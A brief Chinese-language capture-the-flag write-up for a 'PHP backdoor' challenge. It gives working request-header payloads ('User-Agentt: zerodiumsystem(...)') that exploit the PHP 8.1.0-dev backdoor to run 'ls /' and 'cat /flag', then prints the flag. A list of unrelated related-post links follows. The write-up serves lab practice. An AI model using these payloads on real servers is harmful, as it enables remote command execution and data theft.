青少年CTF练习平台 PHP的后门

马船长2025-01-25 0:35

题目

根据提示,PHP/8.1.0-dev漏洞,修改请求头利用此漏洞

注意 zerodium后面拼接函数发送

html 复制代码 
User-Agentt:zerodiumsystem("ls /");

读取flag

html 复制代码 
User-Agentt: zerodiumsystem("cat /flag");

拿下flag

flag{d514c824035b427da2d1c14edb5ae098}

相关推荐
漫漫进阶路4 小时前
VS C++ 配置OPENCV环境
开发语言·c++·opencv
BinaryBardC5 小时前
Swift语言的网络编程
开发语言·后端·golang
code_shenbing5 小时前
基于 WPF 平台使用纯 C# 制作流体动画
开发语言·c#·wpf
邓熙榆5 小时前
Haskell语言的正则表达式
开发语言·后端·golang
ac-er88886 小时前
Yii框架中的队列:如何实现异步操作
android·开发语言·php
hefaxiang7 小时前
【C++】函数重载
开发语言·c++·算法
落幕8 小时前
C语言-构造数据类型
c语言·开发语言
勤又氪猿8 小时前
【问题】Qt c++ 界面 lineEdit、comboBox、tableWidget.... SIGSEGV错误
开发语言·c++·qt
Ciderw8 小时前
Go中的三种锁
开发语言·c++·后端·golang·互斥锁·
热门推荐
012023美赛A题之Lotka-Volterra【完整思路+代码】02Dell服务器升级ubuntu 22.04失败解决03半导体应用系统一些小知识收集(strip&wafer mapping,EAP&scada)04机器人持续学习基准LIBERO系列10——文件结构05Windows10安装PCL1.14.0及点云配准06密码学原理技术-第六章-introduction to pulibc-key cryptography07【全开源】多场馆场地预定小程序源码(ThinkPHP+FastAdmin+UniApp)08xgboost: Why not implement distributed XGBoost on top of spark09(欧拉)openEuler系统添加网卡文件配置流程、(欧拉)openEuler系统手动配置ipv6地址流程、(欧拉)openEuler系统网络管理说明10BMC 虚拟i2c访问PCA9545(switch芯片)后面的设备,为什么找不到PCA9545?